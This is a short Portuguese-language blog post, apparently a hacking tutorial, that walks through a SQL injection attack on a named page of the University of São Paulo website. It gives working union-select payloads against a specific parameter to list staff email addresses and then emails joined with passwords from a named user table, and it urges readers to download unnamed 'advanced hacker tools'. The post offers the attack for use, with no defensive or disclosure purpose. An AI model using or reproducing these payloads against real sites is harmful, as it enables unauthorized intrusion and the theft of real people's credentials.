Explorar um site conhecido para demostrar que todos possuem falhas…
Explicações:
Explorando falha de sql injection no site da USP.br.
Para saber quais seriam as tabelas e colunas do banco de dados, precisei de ter ferramentas avançadas que são restritas para os melhores hackers. Si você é um deles, baixe-a para facilitar sua vida hacker.
Vou demostrar uma invasao via SQL injection no site da USP(universidade de são Paulo)…
Nesta invasão consigo todos os emails de funcionários da USP(universidade de são paulo).
Vamos La:
Abaixo esta o site vulnerável
USP . br / feaecon/graduacao.php?i=21
Usando o código abaixo lista o numero 1 e 2 na tela do site.
?i=-21 union select 1,2
Explicação: o site tenta buscar o post 21 e não encontra para listar e lista os dados do segundo select que é 1,2
Agora, colocando o código ( ?i=-21 union select 1,tx_email from eae_usuario ) o site irá listar todos os emails dos usuários do banco de dados inclusive do webmail deles.
Selecione os emails e jogue eles no Word ou dreamweaver ou sei La…
Agora, iremos fazer o site listar todos os emails e senhas de todos.
Para fazer isso prefisamos usar uma concatenação no SQL.
Código:
graduacao.php?i=-21 union select 1,concat(tx_email,tx_senha) from eae_usuario
a funcao concat(tx_email, tx_senha) mostra o email e a senha na mesta coluna no db.
Postagens
0 comentários:
Postar um comentário